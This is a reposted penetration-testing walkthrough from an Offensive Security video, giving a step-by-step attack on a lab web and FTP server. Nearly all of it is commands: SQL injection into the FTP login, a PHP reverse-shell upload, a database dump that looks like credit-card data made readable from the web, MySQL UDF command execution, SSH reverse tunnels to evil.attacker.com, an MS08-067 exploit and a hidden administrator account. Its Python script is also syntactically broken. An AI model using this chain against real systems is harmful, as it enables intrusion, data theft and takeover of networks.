HOWTO : Penetration Testing in the Real World

*** Do NOT attack any computer or network without authorization or you may be put into jail. ***



Credit to : muts (of Offensive Security)



This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.



Penetration Testing in the Real World from Offensive Security on Vimeo.



ftp-brute.py



#!/usr/bin/python

from ftplib import FTP

print "Attempting user Directory Discover via FTP"

for i in range(0,6):



   username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; --  "

   password=str("1")

   ftp=FTP('www.offseclabs.com')

   ftp.login(username,password)

   print "Logged in as user "+str(i)+",1"

   ftp.retrlines('LIST')

   ftp.close()





Commands





Open Terminal A :



nmap -p 21,80 www.offseclabs.com

nc -v www.offseclabs.com 80

HEAD / HTTP/1.0

(To enumerate the webserver)

clear



ftp www.offseclabs.com

username - bob

password - bob

(To enumerate the ftp server)



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --  

password - 1



(logged in to the ftp server)

pwd

ls

bye



clear



cd core

clear

nano brute.py --> (see above ftp-brute.py)

./brute.py

(get the fifth user who has mapped to the root directory of webserver)

clear



ftp www.offseclabs.com

username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --  

password - 1



(logged in as the fifth user)

ls

put rs.php --> (a reverse php shell)



-----------------------

Open Terminal B :



nc -lvp 80



-----------------------

Open Terminal C :



wget www.offseclabs.com/rs.php



(Then, at Terminal B, we got a reverse shell)



-----------------------

Go back to Terminal B :

(inside the reverse shell)



/sbin/ifconfig

pwd

cd /var/www

ls -la

cd includes

cat configure.php

(get the MySQL username and password as well as MySQL server address and database name)



mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt



------------------------

Open a Firefox :



www.offseclabs.com/images/ccdump.txt

(we got the database dump)



-------------------------

Go back to Terminal A :



(inside the ftp server)

put up.html --> (file upload html file)

put up.php -- > (file upload php file)



-------------------------

Open Firefox :



www.offseclabs.com/up.html



(upload lib_mysqludf_sys.so and marked it as 1)

(upload rs [a binary reverse shell) and marked it as 2)



** Details of lib_mysqludf_sys.so



---------------------------

Go back to Terminal A :



(quit the ftp server)

bye

clear

exit

(quit Terminal A)



----------------------------

Go back to Terminal B :



mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5

(login to MySQL server)

use pwn;

SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';

SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';



CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';

CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';



SELECT sys_eval('chmod 755 /tmp/bd');

SELECT sys_eval('/tmp/bd &');

(don't press Enter at this moment)



---------------------------

Open Terminal D :



nc -lvp 80



(go back to Terminal B and press enter, you will get reserver shell at Terminal D)



----------------------------

Open Terminal E :



nc -lvp 80



----------------------------

Go back to Terminal B :



(inside the MySQL server)

SELECT sys_eval('/tmp/bd &');



(press enter and we got another reverse shell at Terminal E)



---------------------------

Go back to Terminal E :



(inside the reverse shell)

ping -c 1 10.150.0.20

clear



ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com

(create a remote tunnel at port 445)



-----------------------------

Open Terminal F :



netstat antp

nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse



-----------------------------

Go back to Terminal D :



ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com

(create a remote tunnel at port 4444)



clear



------------------------------

Go back to Terminal F :



cd core

nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)

clear

./nx.py 127.0.0.1

nc -v 127.0.0.1 4444



(we got a remote shell of 10.150.0.20)

ip config

net user hacker hacker /add

net localgroup administrators hacker /add



---------------------------------

Go back to Terminal D :



(quit the tunnel)

exit

clear



ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com

(create another remote tunnel on port 3389)

clear



-----------------------------------

Open Terminal G :



netstat -antp | grep LISTEN

clear

rdesktop 127.0.0.1



(login to the 10.150.0.20 with username - hacker and password - hacker)





That's all! See you.